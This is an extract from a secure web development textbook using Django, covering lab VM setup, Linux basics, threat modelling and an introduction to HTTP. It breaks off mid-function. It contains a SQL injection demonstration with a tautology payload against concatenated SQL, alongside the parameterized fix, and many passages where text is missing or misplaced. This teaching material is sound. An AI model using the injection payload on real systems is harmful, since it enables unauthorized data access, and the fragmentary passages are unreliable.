Secure Web Application Development
A Hands-On Guide with Python and Django
Matthew Baker
Kaisten, Aargau, Switzerland
Table of Contents
Acknowledgments
Chapter 1: Introduction
1.1 About This Book
1.2 Who This Book Is For
1.3 Types of Attack
Server-Side Attacks
Client-Side Attacks
1.4 Defense in Depth
1.5 Conventions Used in This Book
1.6 How This Book Is Organized
Base64 Encoding
Digital Signatures
Key Exchange
4.3 Authentication and Certificates
Proving Authenticity
Types of Certificates
Popular Authentication Authorities
4.4 HTTPS
TLS Version 1.2
Perfect Forward Secrecy
TLS Version 1.3
4.5 Summary
PUT Requests
PATCH Requests
DELETE Requests
REST APIs in Django
6.3 Unit Testing Permissions
6.4 Deserialization Attacks
XML Attacks
Function Calls and Creation
Defending Against Deserialization Attacks
6.5 Summary
Bibliography
Index
About the Author
Matthew Baker is the Head of Scientific
Software and Data Management at ETH
Zurich, Switzerland’s leading science and
technology university. He leads a team of
engineers developing custom software to
support STEM research projects and also
teaches computer science short courses.
Having over 25 years of experience developing
software, he has worked as a developer,
systems administrator, project manager, and consultant in various
sectors from banking and insurance, science and engineering, to military
intelligence.
He can be reached at [email protected].
About the Technical Reviewer
Sean Wright is an experienced application
security engineer with an origin as a software
developer. He is primarily focused on web-
based application security with a special
interest in TLS and supply chain–related
subjects. He is experienced in providing
technical leadership in relation to application
security, as well as engaging with teams
to improve the security of systems and
applications that they develop and maintain.
He is passionate about being part of the community and giving back
to it. He also enjoys spending his personal time on
security-related research.
Acknowledgments
No book is a one-man show, and this book would not have gone to print
without the support and encouragement of those around me.
I would like to thank my team at ETH Zurich, especially Dr. Uwe
Schmitt who is a wise and rational sounding board. I would like to thank
the team at Apress for their structured and professional execution and for
giving me so much freedom in authoring this book.
Thanks also to my brother, Julian Baker of Flat Earth Industries, for the
graphics he supplied for this book (I especially like the skull earrings on
Alice the Hacker).
Finally, and most importantly, I would like to thank my friends in
Switzerland, my children, and my wife, Sevda, for their encouragement
and for not complaining when I disappear for hours, or days, in front of my
computers.
CHAPTER 1
Introduction
1.1 About This Book
In 2009, hackers obtained the credentials of over 30 million users
of mobile game publisher RockYou. They exploited a SQL injection
vulnerability to obtain the site’s user table. To make matters worse,
passwords were stored unencrypted, so the hackers could read them
directly without needing to crack them.¹
In 2010, a developer released a Firefox extension called Firesheep that
enabled eavesdroppers to obtain the session IDs of users logged in to
Facebook and other sites over the same Wi-Fi network. This enabled the
eavesdropper to log in as that user without needing to enter a password.²
In 2017, hackers obtained the records of over 130 million individuals
from credit bureau Equifax. The vulnerability was in a web framework
Equifax was using, Apache Struts. The vulnerability had already been
identified and fixed by Apache, but at the time of the hack, Equifax had not
updated to the patched version.³
¹ See https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/
² See https://en.wikipedia.org/wiki/Firesheep
³ See https://en.wikipedia.org/wiki/2017_Equifax_data_breach
There are two broad categories for web application attacks: server side
and client side.
Server-Side Attacks
Server-side attacks target code or services running on the server.
Examples are
Client-Side Attacks
Client-side attacks target the user and the user’s browser. These include
• Physical
• Technical
• Administrative
CHAPTER 2
The Hands-On Environment
2.1 Introducing the Hands-On Environment
In this chapter, we will set up the tools we will use throughout this book
for the hands-on exercises, including a full, running web application plus
other tools. We will see how to run, edit, restart, and interact with the
web application. The application runs in Linux, and for those who are
unfamiliar with it, there is a quick introduction at the end of the chapter.
You can install the tools on Windows, Mac, or Linux.
To practice web application security techniques, in addition to a web
application and host to run it on, you also need a web server, database,
mail server, and so on. To practice cross-site requests, or explore how
hackers could steal your data, you need an additional host, also running a
web server.
As setting up such services can be fiddly, this book comes with two
virtual machines (VMs) that you can download, build, and edit. One is
configured with a sample web application (a toy coffee shop, which we
have imaginatively called Coffeeshop); the other is also running a web
server and is used for exploring cross-site attacks and defenses. We will use
these VMs for the examples and hands-on exercises throughout this book.
The VMs run either in VirtualBox from Oracle or Docker and are built
with Vagrant, a tool that enables us to script the creation of VMs. We will
also install some other tools such as browsers. All the tools needed are free
for noncommercial, personal use (you should read their license terms if
you want to use them beyond working through this book). The VMs run
Linux. If you are not familiar with Linux, a quick introduction is given in
Section 2.8. For a more detailed coverage, see [30].
The sample code is written in Python using the Django web
framework. We use Python 3.8 and Django 3.2. If you are not familiar with
Django, an excellent tutorial is available at
https://docs.djangoproject.com/en/3.2/intro/tutorial01/
The database the application uses is Postgres version 12.
You will need a Windows, Mac, or Linux machine to install the software
on. Each VM needs disk space of around 8GB. As there are two, you will
need around 16GB free. We will also download VirtualBox or Docker,
Vagrant, Chrome, Firefox, and HTTP Toolkit, so if these are not already
installed, you will need space for those too.
Docker containers are usually lighter in weight than VMs and normally
run a single process. We have adapted a solution by John Rofrano¹ that
makes a Docker container more VM-like for interoperability with Vagrant.
https://brew.sh
¹ See https://github.com/rofrano/vagrant-docker-provider
• Windows
• Linux
Install VirtualBox
Unless you have a Mac with the M1 processor, the VMs run in VirtualBox
from Oracle, an open-source virtualization tool that lets you run a machine
inside a machine.
To install it, visit www.virtualbox.org/wiki/Downloads and click on
the link for your operating system.
Optionally, also install the VirtualBox Extension Pack, but bear in
mind it is only free for personal use. The link is a little further down the
downloads page. There is only one version: All supported platforms.
² https://github.com/chipmk/docker-mac-net-connect
³ http://atom.io
⁴ https://code.visualstudio.com
⁵ www.jetbrains.com/pycharm/
https://github.com/git-guides/install-git
and follow the instructions for your OS. For Windows, it will take you to
gitforwindows.com
When you have Git installed, start a command prompt (Windows
Command Tool, Mac Terminal, etc.), change to the directory where you
would like to install the code, and type
or
django-coffeeshop/coffeeshop
and
django-coffeeshop/csthirdparty
Building the Vagrant VM
Vagrant exposes ports that can be mapped to ports on the host system.
Before we build and provision the VMs, we have to make sure these
ports do not clash with other services you are running on your
computer. For the most part, we will access applications on our VMs by
using the VMs’ IP addresses. However, the Coffeeshop VM has one port
mapped to the host computer (we will see why in Chapter 10). Port 8100
on the VM is mapped to port 8100 on the host. If your computer uses this
port for any other purpose, open the Vagrantfile and edit the port-mapping line,
changing the second 8100 to an unused port on your host, for example:
If you don’t know if port 8100 is already used, don’t worry. Proceed to
the next step. If you get an error saying the port is in use, edit the preceding
line and try again.
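If you would rather check the port before running Vagrant, a few lines of Python will do. The following is a minimal sketch and not part of the book's sample code; the function name port_in_use is our own, and it only detects a service that is actively accepting connections on the port.

```python
import socket


def port_in_use(port, host="127.0.0.1"):
    """Return True if something accepts TCP connections on host:port.

    Hypothetical helper for illustration only.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1.0)
        # connect_ex returns 0 on success and an error code otherwise
        return sock.connect_ex((host, port)) == 0
```

Calling port_in_use(8100) on the host before vagrant up indicates whether another port needs to be chosen in the Vagrantfile.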
We can now build the Coffeeshop VM. If you are not on a Mac with an
M1 processor, enter the following at your command prompt:
cd django-coffeeshop/coffeeshop/vagrant
vagrant up
If you are on a Mac with the M1 processor, start the Docker application
from the Launchpad and, once it is running, enter
cd django-coffeeshop/coffeeshop/vagrant
vagrant up --provider docker
Next, build the CSThirdparty VM. If you do not have a Mac with the M1
processor, use the following commands:
cd ../../csthirdparty/vagrant
vagrant up
If you are on a Mac with the M1 processor, use
cd ../../csthirdparty/vagrant
vagrant up --provider docker
⁶ https://wsgi.org
vagrant ssh
vagrant halt
vagrant up
/etc/apache2/sites-enabled
The Database
The Django applications persist their data in Postgres version 12. Don’t
worry if you are unfamiliar with Postgres. Most of our database-related
exercises will be with standard SQL. Some more detail on Postgres is given
in Chapter 5, where we discuss database configuration.
The Coffeeshop application’s user table, auth_user, contains
three users:
You can view these variables at the command line within Vagrant, for
example, with
echo $DBOWNERPWD
Make sure you are in the Vagrant VM first with vagrant ssh. This will
also work in a shell script. You can use them in Python with
import os
...
password = os.environ['DBOWNERPWD']
Note that the usernames and passwords differ between the two VMs.
Storing passwords this way is convenient for our exercises but would
be a concern with production passwords. Password security is discussed in
Section 5.9.
This must be done within the Coffeeshop VM (see Chapter 5 for details
on configuring this). You will be connected as the Postgres superuser
so you can create and delete databases, etc. For connecting to the
CSThirdparty database, replace coffeeshop in the preceding command
with csthirdparty. It must be done from the CSThirdparty VM.
You can obtain an interactive session as the database owner with
psql postgres://$DBOWNER:$DBOWNERPWD@localhost/coffeeshop
or
psql postgres://$DBOWNER:$DBOWNERPWD@localhost/csthirdparty
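The same connection URI can be assembled in Python from the DBOWNER and DBOWNERPWD environment variables. One detail that is easy to miss is that a password containing characters such as @, / or : must be percent-encoded before it is placed in a URI. The sketch below illustrates this; the function names are our own and are not taken from the Coffeeshop code.

```python
import os
from urllib.parse import quote


def build_postgres_uri(user, password, database, host="localhost"):
    """Build a postgres:// URI, percent-encoding the user and password."""
    return "postgres://{}:{}@{}/{}".format(
        quote(user, safe=""), quote(password, safe=""), host, database
    )


def uri_from_environment(database, environ=os.environ):
    """Read DBOWNER and DBOWNERPWD (as set in the VMs) and build the URI."""
    return build_postgres_uri(environ["DBOWNER"], environ["DBOWNERPWD"], database)
```

Inside the Coffeeshop VM, uri_from_environment("coffeeshop") should produce a URI equivalent to the one passed to psql above.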
MailCatcher
Applications need to send email, for example, password reset tokens. For
development purposes, using a real email server is inconvenient: you must
set up a mail server, or at least configure the application to use an existing
one; you must set up a recipient address, wait for the email to arrive, etc.
To avoid this, we use MailCatcher. MailCatcher is an SMTP server.
It runs on port 25, just like other SMTP servers, but instead of actually
sending mail, it makes it available on the local host through a web
interface running on port 1080. The mail doesn’t leave the VM. Any To or
From address can be used—they all arrive in the same place.
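To see MailCatcher at work, you can send a message to it with Python's standard smtplib module. This is a minimal sketch under the assumption stated above that MailCatcher listens on port 25 of the local host; the function names and the example addresses are our own.

```python
import smtplib
from email.message import EmailMessage


def build_test_message(sender, recipient):
    """Create a small plain-text message; any addresses will do."""
    message = EmailMessage()
    message["From"] = sender
    message["To"] = recipient
    message["Subject"] = "MailCatcher test"
    message.set_content("This message should appear in the MailCatcher web interface.")
    return message


def send_via_mailcatcher(message, host="localhost", port=25):
    """Hand the message to the SMTP server (assumed to be MailCatcher)."""
    with smtplib.SMTP(host, port) as smtp:
        smtp.send_message(message)
```

Run inside the VM, send_via_mailcatcher(build_test_message("alice@example.com", "bob@example.com")) should make the message visible in the web interface on port 1080.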
http://10.50.0.2:1080
or
http://10.50.0.3:1080
Changing the Code
As the web application code is in the vagrant directory, which is mounted in
your VM, you can edit the code on your host using your favorite editor or
IDE. You can also edit it within the VM if you choose. See Section 2.4 for
tips on text editors.
Starting from Scratch
If you find your application has stopped working due to a bad code
change, you can view the differences between your code and the original
Git repository with
git diff
If you wish to discard all your changes and revert to the state in the
repository, you can enter
Take care as this will permanently delete your edits, including deleting
files you have created that are not in the repository. You can undo changes
in just the current directory with
git checkout -- .
Command-Line Input
Commands are entered by typing the command name followed by
arguments separated by spaces. If commands or arguments contain
spaces or special characters, they must be escaped with a backslash \, for
example:
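How the shell splits a command line into arguments can be explored from Python with the standard shlex module, which follows similar rules. The file name my file.txt below is a made-up example.

```python
import shlex

# A backslash keeps the space inside a single argument.
print(shlex.split(r"ls my\ file.txt"))

# Without the backslash, the line is split into two separate arguments.
print(shlex.split("ls my file.txt"))

# shlex.quote() returns a form of the argument that is safe to paste
# into a command line (it uses quotes rather than a backslash).
print(shlex.quote("my file.txt"))
```

The first call yields the two items ls and my file.txt, whereas the second yields three items, which is why an unescaped space makes a command look for two files instead of one.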
Navigating the Filesystem
To list the contents of a directory, use the ls command. For example:
ls /vagrant/coffeeshopsite
ls coffeeshop
ls ../coffeeshop
You can also use a single dot, which is the current directory. The ls
command by itself lists the current directory.
To list more details about files and directories, use ls -l, for example:
ls -l /vagrant
This lists the permissions, owner, group, size, and last modification
date of each file. By default, hidden files and directories (those beginning
with a dot) are not listed. To list these as well, add -a to the command line,
for example:
ls -a /vagrant
ls -la /vagrant
cd /vagrant/coffeeshop
cd coffeeshop
mkdir test
rm log.txt
rmdir test
rm -r test
rm -rf test
When you first log in, you will be in your home directory. In our VMs,
this is /home/vagrant. If you log in as root (see later), the home directory
is /root.
Linux Permissions
A Linux system comes with a number of users built in, most of which
cannot be logged in as directly. In a Vagrant VM, the default regular user is
vagrant. Other important users include the superuser account, root; the
user the web server runs as, www-data; and the user the database runs as,
postgres.
A user is a member of one or more groups. By default, the vagrant
user is a member of a group also called vagrant. The www-data user is a
member of a group also called www-data. You can see what groups you are
a member of with the groups command.
Files and directories are owned by a user and a group. They have
separate permissions for the owner, the group, and other users. Those
permissions consist of read, write, and execute flags. You can see them
when you run ls -l, for example:
ls -l /vagrant
total 20
-rw-r--r-- 1 vagrant vagrant 688 Oct 2 17:05 Vagrantfile
drwxr-xr-x 1 vagrant vagrant 160 Oct 2 17:05 apache2
-rw-r--r-- 1 vagrant vagrant 3435 Oct 12 06:36 bootstrap.sh
drwxr-xr-x 1 vagrant vagrant 288 Oct 3 10:08 csthirdpartysite
drwxr-xr-x 1 vagrant vagrant 96 Oct 2 17:05 mailcatcher
drwxr-xr-x 1 vagrant vagrant 128 Oct 2 17:05 postgres
-rw-r--r-- 1 vagrant vagrant 22 Oct 2 17:05 reboot-provision.sh
The permissions are in the first column. The first character is - for a
regular file and d for a directory. The next three characters are the read,
write, and execute permissions for the owner, the next three for the group,
and the next three for all other users. Execute permission means the
file can be executed. Execute permission on a directory means it can be
cd’d into.
You can change the permissions on a file with the chmod command.
There are two ways. One way is to give one or more permission groups (u
for user (owner), g for group, or o for other), followed by a plus or minus,
followed by one or more permission flags (r, w, or x). For example:
will give read, write, and execute permission for the owner (binary 111 =
octal 7), read and execute permission for the group (binary 101 = octal 5),
and just read permission for other (binary 100 = octal 4).
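The mapping between octal digits and permission flags can be checked with Python's standard stat module. In this small sketch, the helper name describe_mode is our own; it converts an octal mode into the string that ls -l would show for a regular file.

```python
import stat


def describe_mode(octal_mode):
    """Return the ls -l style permission string for a regular file."""
    # S_IFREG marks the entry as a regular file, giving the leading "-"
    return stat.filemode(stat.S_IFREG | octal_mode)


print(describe_mode(0o754))  # -rwxr-xr--
print(describe_mode(0o644))  # -rw-r--r--
```

Each octal digit is simply the three-bit read, write, execute pattern for owner, group, and other in turn.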
You can change the ownership of a file with chown, though only the
superuser root can do this, for example:
Permissions in Vagrant
For Vagrant folders sync-mounted from the host computer (our /vagrant
and /secrets directories), changing ownership and permissions has no
effect. As Vagrant runs on a variety of operating systems, whose permission
system may not be compatible with Linux, Vagrant assigns a fixed owner,
group, and permissions for these directories and their contents. This is
configured in Vagrant.
runs the psql command (an interactive SQL session) as user postgres.
A convenient way of getting a Bash session as root is
sudo su -
Environment Variables
Variables can be assigned in Bash. By default, these are only available
in that Bash process, not other commands executed from that process.
However, they can be exported as environment variables that are available
to subprocesses.
For example:
apphome=/vagrant/coffeeshop
export APPHOME=/vagrant/coffeeshop
source script.sh
echo $APPHOME
will print the contents of the APPHOME variable to the terminal. This is also
true if enclosed in double quotes, for example:
echo "$APPHOME"
echo '$APPHOME'
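The difference between a plain Bash variable and an exported environment variable has a close analogue in Python: an ordinary Python variable is invisible to child processes, while an entry in the environment is inherited. The sketch below demonstrates this by starting a child Python process; the helper name apphome_seen_by_child is our own.

```python
import os
import subprocess
import sys

# Code run in the child process: print APPHOME as the child sees it.
CHILD_CODE = "import os; print(os.environ.get('APPHOME', 'not set'))"


def apphome_seen_by_child(env):
    """Start a child Python process with the given environment and return its output."""
    result = subprocess.run(
        [sys.executable, "-c", CHILD_CODE],
        env=env, capture_output=True, text=True, check=True,
    )
    return result.stdout.strip()


# An ordinary variable stays in this process, like an unexported Bash variable.
apphome = "/vagrant/coffeeshop"
base_env = {k: v for k, v in os.environ.items() if k != "APPHOME"}
print(apphome_seen_by_child(base_env))  # not set

# Placing it in the environment is the equivalent of "export".
print(apphome_seen_by_child({**base_env, "APPHOME": apphome}))  # /vagrant/coffeeshop
```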
Text Editors
To edit files within the sync-mounted directories /vagrant and /secrets,
you can use an editor on the host machine: as the files exist both on the
host and VM, you can edit them from either.
To edit files in other directories, you will need to use an editor in the
VM. As the VMs do not have a graphical UI, graphical editors such as
Visual Studio Code or Atom will not work. The three editors installed on
the VMs are Vi, Pico, and Nano.
If you are not experienced with editing files in Linux, Pico and Nano
will feel more intuitive than Vi. To edit a file, type nano (or pico) followed
by the name, for example:
nano newfile.txt
Arrow keys work as expected, Ctrl-S saves the file and Ctrl-X exits.
There are numerous good resources on Nano, for example:
https://linuxize.com/post/how-to-use-nano-text-editor/
If you just want to view a file, not edit it, the cat command will print
the file to standard output, without pagination.
The less command will paginate it, for example:
less Vagrantfile
jupyter-lab &
[1] 857268
kill %1
The job ID is only available from the Bash session you ran the
command from. The pid can be used from any Bash session.
You can list processes with the ps command. By itself, it will only list
foreground processes running as the current user. Add the x option to list
background processes and add the a option to list processes run by all
users, for example:
ps ax
ls > files.txt
will list all files in the current directory into a file called files.txt. Using
two greater-than signs
ls >> files.txt
bc < sum.txt
ps ax | less
displays all running processes, but rather than printing them to the screen, it
passes them as input to the command less, which also prints to the screen but
paginates the output. The less command, as we saw before, paginates a file given as
a command-line argument. With no command-line argument, it paginates
standard input.
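Redirection and pipes are not specific to Bash; they are features of how processes are connected. As an illustration, the following sketch reproduces the >, >> and | operators with Python's subprocess module. The function names are our own and the code is only meant to show the mechanism.

```python
import subprocess


def redirect_to_file(command, path, append=False):
    """Run command with stdout sent to path, like > (or >> when append=True)."""
    with open(path, "a" if append else "w") as output:
        subprocess.run(command, stdout=output, check=True)


def pipe(first, second):
    """Run first | second and return the output of second as text."""
    producer = subprocess.Popen(first, stdout=subprocess.PIPE)
    consumer = subprocess.Popen(second, stdin=producer.stdout,
                                stdout=subprocess.PIPE, text=True)
    # Close our copy so the producer notices if the consumer exits early.
    producer.stdout.close()
    output, _ = consumer.communicate()
    producer.wait()
    return output
```

For example, redirect_to_file(["ls"], "files.txt") corresponds to ls > files.txt, and passing append=True corresponds to ls >> files.txt.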
Clearing the Terminal
You can clear the text on the terminal, restoring the command prompt at
the top of the window, with the command clear. Alternatively, press Ctrl-L.
Exiting Bash
You can exit Bash with the exit command or by typing Ctrl-D.
2.9 Summary
In this chapter, we installed a full, running web application, Coffeeshop,
which we will use throughout the book to practice web security
techniques. We also installed another web application, CSThirdparty,
which we will use to practice cross-site techniques. These came in the
form of Vagrant VMs running a complete Ubuntu-Linux OS with our web
applications and a mock mail server.
We installed the two most popular cross-platform web browsers,
Firefox and Chrome. Each implements a different set of security measures,
so it is important to have both at our disposal.
We installed a text editor to edit the web application code and HTTP
Toolkit, a tool for examining and editing HTTP requests and responses.
In Chapter 4, we will start getting our hands dirty with the HTTP
protocol. But first, we will look at the more fundamental topic of threat
modelling: understanding what we are trying to protect and from whom.
CHAPTER 3
Threat Modelling
In this chapter, we look at the fundamental task of understanding what we
are trying to protect and where threats come from. There are a number of
ways to achieve this. The first method we will look at is asset modelling,
which seeks to enumerate what we want to protect by looking at what is
valuable to our organization.
We will also look at the STRIDE model, a common methodology for
characterizing threats, before diving into a data-flow-oriented approach
to modelling the threat landscape. This will enable us to understand the
attack surface and attack vectors—the entry points and attack processes
hackers may use to gain access to our assets.
Assets
Let us list the assets for an example application. Consider a scientific
group at a university that makes a climate change model available on the
Internet. Users can enter environmental parameters, and the site then
makes a climate prediction. For maximum reach, the group decides not to
require users to log in. As the data on their site are public domain, they do
not initially believe the data must be secured.
We may consider the following to be the assets:
• Climate data
• Server availability
• Group’s reputation
Threats
Having identified the assets, we next look at the threats to them. An
example is shown in Table 3-1.
From this analysis, it is clear that although the data are public
and perhaps not worth preventing unauthorized users from reading,
there is a threat of the data being written to, with potentially damaging
consequences. For example, the research group may end up using the
modified data for publications and recommendations. Also, due to the
denial-of-service threats, they may wish to review their decision not to
require users to register and log in or take other steps to minimize abuse.
Threat Actors
We can use the assets and threats to identify threat actors: individuals or
organizations interested in that asset and posing that threat.
Threat actors are often divided into categories like the following:
Based on this analysis, the developers can decide where to focus their
defensive efforts. There is, for example, little impact and likelihood of a
denial-of-service attack on the web server, but there is a high interest, and
medium sophistication, in fraudulent use of their back-end servers. The
developers may therefore choose to rely on upstream network providers to
filter out denial-of-service attacks but may take extra precautions to protect
their back-end servers, for example, by throttling and logging requests.
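One simple way to turn such an analysis into priorities is to give each threat a numeric score. The sketch below assumes a three-level scale and a score of impact multiplied by likelihood; this is a common convention rather than a method prescribed here, and the two entries and their ratings are purely illustrative.

```python
from dataclasses import dataclass

# Assumed three-level scale; adjust to your own organization's scheme.
LEVELS = {"low": 1, "medium": 2, "high": 3}


@dataclass
class Threat:
    name: str
    impact: str
    likelihood: str

    @property
    def score(self):
        """Impact multiplied by likelihood on the assumed 1-3 scale."""
        return LEVELS[self.impact] * LEVELS[self.likelihood]


def rank(threats):
    """Return threats ordered from highest to lowest score."""
    return sorted(threats, key=lambda t: t.score, reverse=True)


# Illustrative ratings only; a real register comes from your own analysis.
threats = [
    Threat("Denial of service on the web server", "low", "low"),
    Threat("Fraudulent use of back-end servers", "high", "medium"),
]
for threat in rank(threats):
    print(threat.score, threat.name)
```

A ranked list like this is only a starting point for discussion; the ratings themselves remain a matter of judgment.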
3.3 STRIDE
STRIDE is a method of categorizing risks. It stands for
• Spoofing
• Tampering
• Repudiation
• Information Disclosure
• Denial of Service
• Elevation of Privilege
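When recording threats in a tool or spreadsheet, it can help to treat the STRIDE categories as a fixed vocabulary. The following sketch pairs each category with the security property it is commonly said to violate; that pairing is the widely used convention and is our addition, as is the class name Stride.

```python
from enum import Enum


class Stride(Enum):
    """STRIDE categories, each paired with the security property it violates."""
    SPOOFING = "authentication"
    TAMPERING = "integrity"
    REPUDIATION = "non-repudiation"
    INFORMATION_DISCLOSURE = "confidentiality"
    DENIAL_OF_SERVICE = "availability"
    ELEVATION_OF_PRIVILEGE = "authorization"


def acronym():
    """Join the first letter of each category, in definition order."""
    return "".join(member.name[0] for member in Stride)


print(acronym())  # STRIDE
```

Tagging each identified threat with one of these values makes it easy to spot categories that have not yet been considered.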
Trust Boundaries
Threats can become clearer if we add trust boundaries to the diagram.
Trust boundaries mark places where the level of trust changes. There is a
trust boundary between a corporate intranet and the public Internet—only
employees of the company are allowed access to the corporate intranet.
External users are restricted to accessing the application over HTTPS.
Trust boundaries can also exist between hosts. In our example,
different users may have access to the development and production VMs.
There can also be trust boundaries between processes. For example,
our web server runs as user www-data, whereas the database runs as user
postgres. The postgres user cannot edit files owned by www-data and
vice versa.
Figure 3-2 shows the same data-flow model from Figure 3-1 but with
trust boundaries added.
The trust boundaries make further threats clear. For example, there is
an elevation-of-privilege threat from the www-data user to the prod user.
These threats may not exist as actual vulnerabilities, but it is useful
to enumerate them anyway. They form a checklist when testing the
implementation.
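The idea of looking for data flows that cross a trust boundary can be expressed in a few lines of code. The sketch below is a hypothetical model, loosely based on the examples in this section; the class names, elements, and zone labels are our own and do not reproduce the figures.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Element:
    name: str
    zone: str  # the trust zone the element runs in


@dataclass(frozen=True)
class Flow:
    source: Element
    target: Element
    label: str


def flows_crossing_boundaries(flows):
    """Return the flows whose two ends sit in different trust zones."""
    return [flow for flow in flows if flow.source.zone != flow.target.zone]


# Hypothetical model for illustration.
browser = Element("Browser", zone="public Internet")
web_server = Element("Web server", zone="www-data")
app_code = Element("Django application", zone="www-data")
database = Element("Database", zone="postgres")

flows = [
    Flow(browser, web_server, "HTTPS request"),
    Flow(web_server, app_code, "WSGI call"),
    Flow(app_code, database, "SQL query"),
]
for flow in flows_crossing_boundaries(flows):
    print(f"{flow.source.name} -> {flow.target.name}: {flow.label}")
```

Here the HTTPS request and the SQL query are reported, since each connects elements in different zones; these are the flows that deserve the closest scrutiny.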
3.5 Responding to Threats
Once a list of threats has been identified, our response can be classified
into three categories:
• Accept
• Mitigate
• Avoid
3.6 Attack Vectors
Attacks on systems can be multistep and complex. A vulnerability might
not seem serious until viewed as a step in a wider process. We call the
whole process an attack vector.
Consider the example in Figure 3-3. The attacker sends an individual
a spear-phishing email with a link to malicious software. Spear-phishing
emails are designed to convince the recipient to disclose information or
click on a link. Unlike regular phishing emails, they are crafted specifically
for an individual or group of people. In this example, it may appear
to come from the victim’s manager, asking them to install a particular
application.
The victim clicks on the link and downloads the software which,
unbeknownst to them, is a Trojan. A Trojan is malicious software disguised
as something else. It is named after the Greek legend, recounted in Homer’s Odyssey, in which
Greek warriors entered the besieged city of Troy by hiding inside a wooden
horse. In our case, we have code disguised as legitimate software but that
actually opens a reverse shell to the attacker’s server (reverse shells are
described in Chapter 7).
Once the reverse shell is established, the attacker uses it to download
the victim’s SSH keys. Among these keys is one that grants the attacker
access to a GitHub repository. The attacker changes the source code in this
repository, adding a backdoor for them to gain administrator access to the
software.
In this example, the intended target was not the initial victim but a
separate software system.
3.7 Attack Surfaces
NIST, the National Institute of Standards and Technology, defines the
attack surface as
[T]he set of points on the boundary of a system,
a system element, or an environment where an
attacker can try to enter, cause an effect on, or
extract data from that system, system element, or
environment [27].
• URL endpoints
• Files
• Databases
• IP addresses and open ports
• Email accounts
Next, list user accounts and groups on the servers that own files or
run services. This includes the OS accounts, database accounts, and
application accounts (e.g., admin accounts).
As an example, our Coffeeshop application contains a Postgres
database running on the same VM as the web application. The database is
run by the postgres Linux user, and the application connects to it as the
coffeeshopwebuser user, which is the owner of the coffeeshop database
and therefore has full access to all tables. Note this is not a good idea in
production systems—see Chapter 5 for better practices. The postgres user
on the VM can connect to the database without providing a password (this
is called peer authentication; again, see Chapter 5).
This means the attack surface for the database includes all URL
endpoints that contain code that accesses the database. Particular
attention should be paid to the set of those endpoints where SQL code is
joined with user input. We will cover this in detail in Chapter 7.
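To make "SQL code joined with user input" concrete, here is a minimal sketch. It uses Python's built-in sqlite3 module in place of Postgres, and the product table and both function names are hypothetical, chosen only for illustration. The first function builds the query by string concatenation; the second passes the value as a parameter.

```python
import sqlite3

def find_products_unsafe(conn, name):
    # User input is joined directly into the SQL text. An endpoint that
    # calls code like this deserves particular attention.
    sql = "SELECT id, name FROM product WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()

def find_products_safe(conn, name):
    # The value is passed separately from the SQL text as a parameter.
    return conn.execute(
        "SELECT id, name FROM product WHERE name = ?", (name,)
    ).fetchall()

# Hypothetical in-memory table used only for this illustration.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO product (name) VALUES (?)",
                 [("espresso",), ("latte",)])

malicious = "x' OR '1'='1"
print(find_products_unsafe(conn, malicious))  # the injected condition matches every row
print(find_products_safe(conn, malicious))    # treated as a literal name, so no match
```

When mapping the attack surface, endpoints resembling the first function are the ones to list first.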
The attack surface also includes any files that contain the database
password, the Postgres port 5432 on the VM, and any host from which
it is reachable. As the postgres user can access the database without a
password, the attack surface includes any user account with access to the
postgres user via sudo.
For more information on mapping the attack surface, see OWASP’s
guide [22]. For a good book on threat modelling, which expands on the
techniques in this chapter, see [29].
3.8 Summary
In this quite theoretical chapter, we looked at how to identify threats. We
started with the asset-based method, which can be applied even before
any code is written. We looked at the STRIDE method for characterizing
threats. This technique is useful because it forces us to think in terms of
well-understood threat categories. It helps prevent us from missing threats.
We used data-flow diagrams to identify where threats may exist in
our application. This is a more technical method compared with asset
modelling and requires an understanding of the application architecture
and protocols. It also enables us to identify specific threats that are easy to
miss without looking at concrete implementations.
Hackers rarely achieve their goals by exploiting a single vulnerability.
They construct an attack vector, which is a sequence of steps to achieve
their final goal. We looked at how exploiting seemingly harmless
vulnerabilities can be part of a more damaging hacking campaign.
Finally, we looked at the attack surface, the sum of all entry points into
our application. Understanding the attack surface helps us identify what
weaknesses in our application need strengthening.
In the next chapter, we will look at the most fundamental component
of a web application, the HTTP protocol, as well as encryption techniques
used to make it safer. We will get our hands dirty by experimenting with
the protocol itself plus do some practical encryption using our hands-on
environment.
CHAPTER 4
Transport and Encryption
In this chapter, we look at the most fundamental building block of web
applications: the HTTP protocol. This is the protocol browsers and web
servers use to communicate with each other.
Most web applications use the encrypted version of HTTP, called
HTTPS. So that we can understand this, as well as some topics in future
chapters, we look in some detail at encryption methods before learning
how they are applied in the HTTPS protocol. Encryption techniques
fall into two categories: symmetric and public key. Both are covered in
this chapter. We also look at TLS/SSL certificates, which are an essential
component of HTTPS.
As HTTP and encryption are so fundamental to web application
security, we will use our hands-on environment to explore the techniques
covered in this chapter.
Clients send requests to servers, and servers send back responses. The
main protocol for web requests and responses is the Hypertext Transfer
Protocol (HTTP) [11] or its encrypted version, HTTPS (the “S” stands
for secure). The most used version is 1.1. It was originally described by
RFC 2616, which can be found at
www.rfc-editor.org/rfc/rfc2616.txt
RFC 2616 has since been superseded, most recently by RFCs 9110 and 9112.
Requests and Responses
HTTP is a simple request-response protocol running, by default, on port
80. A client (e.g., a web browser) sends a request to a server. The server
sends back a response. HTTP is stateless: each request and response is self-
contained, and no data is stored in between requests (though we will talk
about persisting data in Chapter 7).
An example HTTP request is
GET / HTTP/1.1
Host: localhost
GET is the method, requesting that the server sends us a resource. GET
and other HTTP methods are described in Section 4.1.
After GET is the URI of the resource being requested, / in this case. This
is the part of the URL after the hostname (and port number, if that is in the
URL). The third parameter is the protocol the resource is being requested
over, HTTP version 1.1 in this case.
The following line specifies the host the resource is being requested
from, localhost. A colon followed by a port number can be appended to
the hostname. If it is not, as in our case, it defaults to 80.
Other headers can optionally follow, one line each with the form
Header-Name: value
For some methods (e.g., POST), a body follows the headers, after a
blank line. A Content-Type header is needed to tell the server what format
the body is in (see the next section).
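The request format can be sketched in Python as follows. This is a minimal illustration, not a full HTTP client: the function names build_request and send_request are our own, and the Connection: close header is an assumption added so that the server closes the socket after responding. Note that each line of an HTTP request is terminated with a carriage return and line feed.

```python
import socket

def build_request(host, path="/", port=80, extra_headers=None):
    """Return a minimal HTTP/1.1 GET request as bytes."""
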